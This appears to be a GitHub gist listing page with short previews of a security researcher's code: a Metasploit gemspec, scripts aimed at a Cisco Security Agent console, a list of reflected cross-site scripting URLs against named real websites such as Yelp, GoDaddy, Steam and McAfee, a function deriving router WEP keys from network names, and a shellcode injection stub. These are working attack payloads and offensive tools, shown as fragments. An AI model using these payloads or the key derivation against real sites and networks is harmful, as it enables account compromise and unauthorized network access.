This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Drop this into msf3 root-dir as 'msf-rex.gemspec'. | |
# | |
# Create gem with: | |
# $ gem build msf-rex.gemspec | |
# | |
# Note there's already a "rex" rubygem, which is why we used 'msf-rex'. | |
# We can still "require 'rex'" though. | |
$: << 'lib' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# Thu 24 Jun 2010 04:20:52 AM EDT | |
import httplib | |
import mimetools | |
import StringIO | |
_boundary = mimetools.choose_boundary() | |
_host_uid = 'C087EFAE-05A2-4A0B-9512-E05E5ED84AEB' | |
_csamc = "192.168.0.108" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
https://hackalert.armorize.com/givepassword.php/%22%3E%3Cscript%3Ealert('oops')%3C/script%3E | |
http://data.mint.com/search?q=%22)})}alert('pwned');{({/*&offset=0&max=30&numpages=4 | |
https://biz.yelp.com/signup/dAecu6T1DJiDrAVZ-uIVtw/?return_url=%22%3E%3C/a%3E%3Cscript%3Ealert(1)%3C/script%3E | |
https://support.steampowered.com/register.php?password2=%22/style=%22position:fixed;top:0px;left:0px;height:100%;width:100%%22/onmouseover=%22alert%28/XSS/%29 | |
https://idp.godaddy.com/Error.aspx?SPKey=%22;alert%281%29;// | |
http://sandboxbeta.sunbeltsoftware.com/loginlocked.aspx?FTVAR_REDIRECTURLFRM=%22%20STYLE%3d%22width:%20expression(window.x?0:(alert(/XSS/),window.x%3d1));%22 | |
http://www.webroot.com/En_US/search-results.html?q=');alert('gerry | |
http://www.mcafee.com/apps/search/threat.aspx?q=';alert(1);//&v=malware | |
http://products.verizonwireless.com/index.aspx?';alert(1)// |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
"""htl_extract.py, Extracts the embedded source code from Cisco Security Agent Management Console. | |
Gerry <gerry@hiredhacker.com> | |
""" | |
import os | |
import sys | |
import struct | |
import pefile | |
from itertools import takewhile |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Calculate the lower 6 bytes of the WEP key, the upper 4 are from the MAC | |
# address of the router (1801 or 1F90) | |
def get_key(essid): | |
key = sum(int(val, 36) * (36**idx) for idx, val in enumerate(essid)) | |
return hex(key) | |
# >>> print get_key("E3X12") | |
# 0x349fca |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
offset = 0x1000 - len(scode) - 32 | |
tls_header = "\xE8\x00\x00\x00\x00" # CALL $+5 | |
tls_header += "\x5E" # POP ESI | |
tls_header += "\x83\xC6\x1B" # ADD ESI, 0x1b | |
tls_header += "\xB9" + struct.pack("<L", len(scode)) # MOV ECX, len(scode) | |
tls_header += "\x64\x8B\x3D\x30\x00\x00\x00" # MOV EDI,DWORD PTR FS:[30] | |
tls_header += "\x81\xC7" + struct.pack("<L", offset) # ADD EDI, offset | |
tls_header += "\x57" # PUSH EDI | |
tls_header += "\xFC" # CLD | |
tls_header += "\xF3\xA4" # REP MOVSB [EDI], [ESI] |
NewerOlder